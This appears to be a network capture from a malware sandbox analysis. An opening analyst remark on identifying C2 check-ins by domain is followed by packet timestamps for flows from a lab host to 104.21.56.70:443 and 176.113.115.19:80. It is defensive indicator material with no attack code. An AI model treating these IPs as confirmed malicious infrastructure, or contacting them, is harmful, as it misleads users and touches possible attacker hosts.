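Keying the check-in on the full four-tuple rather than on the destination IP alone matters because the 104.21.x.x and 172.67.x.x addresses in this capture are shared reverse-proxy space; the domain is the durable indicator, and an IP is only worth blocking when a check-in was observed on a flow whose SNI named one of the C2 domains.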
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 15, 2024 09:20:21.834172964 CET | 49705 | 443 | 192.168.2.8 | 104.21.56.70
Dec 15, 2024 09:20:21.834222078 CET | 443 | 49705 | 104.21.56.70 | 192.168.2.8
Dec 15, 2024 09:20:21.834314108 CET | 49705 | 443 | 192.168.2.8 | 104.21.56.70
Dec 15, 2024 09:20:21.845436096 CET | 49705 | 443 | 192.168.2.8 | 104.21.56.70
Dec 15, 2024 09:20:21.845454931 CET | 443 | 49705 | 104.21.56.70 | 192.168.2.8
Dec 15, 2024 09:20:23.066962957 CET | 443 | 49705 | 104.21.56.70 | 192.168.2.8
Dec 15, 2024 09:20:23.067035913 CET | 49705 | 443 | 192.168.2.8 | 104.21.56.70
Dec 15, 2024 09:20:23.134021997 CET | 49705 | 443 | 192.168.2.8 | 104.21.56.70
Dec 15, 2024 09:20:23.134052038 CET | 443 | 49705 | 104.21.56.70 | 192.168.2.8
Dec 15, 2024 09:20:23.134404898 CET | 443 | 49705 | 104.21.56.70 | 192.168.2.8
Dec 15, 2024 09:20:23.134464025 CET | 49705 | 443 | 192.168.2.8 | 104.21.56.70
Dec 15, 2024 09:20:23.138425112 CET | 49705 | 443 | 192.168.2.8 | 104.21.56.70
Dec 15, 2024 09:20:23.179339886 CET | 443 | 49705 | 104.21.56.70 | 192.168.2.8
Dec 15, 2024 09:20:23.689284086 CET | 443 | 49705 | 104.21.56.70 | 192.168.2.8
Dec 15, 2024 09:20:23.689389944 CET | 443 | 49705 | 104.21.56.70 | 192.168.2.8
Dec 15, 2024 09:20:23.689623117 CET | 49705 | 443 | 192.168.2.8 | 104.21.56.70
Dec 15, 2024 09:20:23.698709011 CET | 49705 | 443 | 192.168.2.8 | 104.21.56.70
Dec 15, 2024 09:20:23.698736906 CET | 443 | 49705 | 104.21.56.70 | 192.168.2.8
Dec 15, 2024 09:20:23.698745966 CET | 49705 | 443 | 192.168.2.8 | 104.21.56.70
Dec 15, 2024 09:20:23.699466944 CET | 49705 | 443 | 192.168.2.8 | 104.21.56.70
Dec 15, 2024 09:20:23.812845945 CET | 49706 | 80 | 192.168.2.8 | 176.113.115.19
Dec 15, 2024 09:20:23.932523966 CET | 80 | 49706 | 176.113.115.19 | 192.168.2.8
Dec 15, 2024 09:20:23.933331966 CET | 49706 | 80 | 192.168.2.8 | 176.113.115.19
Dec 15, 2024 09:20:23.933777094 CET | 49706 | 80 | 192.168.2.8 | 176.113.115.19
Dec 15, 2024 09:20:24.053442001 CET | 80 | 49706 | 176.113.115.19 | 192.168.2.8
Dec 15, 2024 09:20:25.258672953 CET | 80 | 49706 | 176.113.115.19 | 192.168.2.8
Dec 15, 2024 09:20:25.258775949 CET | 80 | 49706 | 176.113.115.19 | 192.168.2.8
Dec 15, 2024 09:20:25.258833885 CET | 49706 | 80 | 192.168.2.8 | 176.113.115.19
Dec 15, 2024 09:20:25.258833885 CET | 49706 | 80 | 192.168.2.8 | 176.113.115.19
Dec 15, 2024 09:20:25.258866072 CET | 80 | 49706 | 176.113.115.19 | 192.168.2.8
Dec 15, 2024 09:20:25.258917093 CET | 49706 | 80 | 192.168.2.8 | 176.113.115.19
Dec 15, 2024 09:20:25.258946896 CET | 80 | 49706 | 176.113.115.19 | 192.168.2.8
Dec 15, 2024 09:20:25.258984089 CET | 80 | 49706 | 176.113.115.19 | 192.168.2.8
Dec 15, 2024 09:20:25.259010077 CET | 49706 | 80 | 192.168.2.8 | 176.113.115.19
Dec 15, 2024 09:20:25.259033918 CET | 49706 | 80 | 192.168.2.8 | 176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.259063005 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.259114981 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.259154081 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.259190083 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.259203911 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.259227037 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.259234905 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.259279013 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.259388924 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.259440899 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.378681898 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.378761053 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.378806114 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.378806114 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.382901907 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.382957935 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.451277971 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.451351881 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.451355934 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.451416969 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.455379963 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.455440998 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.455517054 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.455569029 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.463836908 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.463893890 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.463898897 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.463953018 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.472207069 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.472264051 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.472270012 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.472371101 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.480640888 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.480720043 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.480801105 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.480850935 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.489309072 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.489365101 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.489373922 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.489419937 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.497518063 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.497554064 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.497575998 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.497607946 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.505965948 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.506026983 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.506036997 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.506086111 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.514481068 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.514554024 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.514575005 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.514638901 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.522792101 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.522875071 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.522937059 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.522994995 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.530438900 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.530487061 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.530509949 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.530549049 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.658595085 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.658658028 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.658664942 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.658720016 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.660917997 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.660967112 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.661092043 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.661150932 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.665587902 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.665641069 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.665731907 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.665782928 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.670281887 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.670339108 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.670377970 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.670435905 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.674952030 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.675005913 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.675057888 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.675101995 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.679626942 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.679678917 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.898466110 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.898523092 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.898550034 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.898602009 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.902230024 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.902273893 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.902285099 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.902318001 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.905888081 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.905971050 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.905971050 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.906008959 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.909626961 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.909691095 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.909722090 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.909778118 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.913351059 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.913415909 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.913474083 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.913530111 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.917035103 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.917097092 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.917141914 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.917196989 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.920881987 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.920955896 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.921020031 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.921071053 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.924597025 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.924657106 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.924698114 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.924750090 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.928236008 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.928297043 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.928344011 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.928410053 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.931978941 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.932033062 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.932127953 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.932183981 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.935683012 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.935750008 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.935791016 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.935836077 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.939515114 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.939589977 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.939593077 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.939636946 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.943176031 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.943243027 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.943284035 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.943348885 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.946846008 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.946902037 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.946984053 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.947037935 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.950587988 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.950639963 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.950689077 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.950737000 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.954330921 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.954389095 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.954463005 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.954514980 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.958066940 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.958121061 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.958153963 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.958205938 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.961752892 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.961829901 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.961864948 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.961920977 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.046216965 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.046281099 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.046282053 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.046323061 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.047605038 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.047653913 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.047732115 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.047777891 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.050664902 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.050717115 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.122149944 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.122201920 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.122373104 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.122538090 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.124298096 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.124355078 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.124413967 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.124460936 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.126792908 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.126840115 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.126878023 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.126919985 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.129312038 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.129359007 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.129393101 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.129436970 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.131788969 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.131843090 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.131850004 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.131886959 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.134243011 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.134295940 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.134354115 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.134404898 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.136739016 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.136789083 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.136833906 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.136873007 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.139341116 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.139398098 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.139465094 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.139508963 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.141748905 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.141796112 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.141835928 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.141879082 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.144233942 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.144280910 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.144339085 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.144396067 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.146733046 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.146764040 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.146785021 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.146802902 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.149234056 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.149264097 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.149285078 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.149334908 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.151731014 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.151782036 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.151824951 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.151878119 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.154215097 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.154267073 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.154330969 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.154381037 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.156719923 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.156771898 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.156843901 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.156897068 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:26.159214020 CET8049706176.113.115.19192.168.2.8
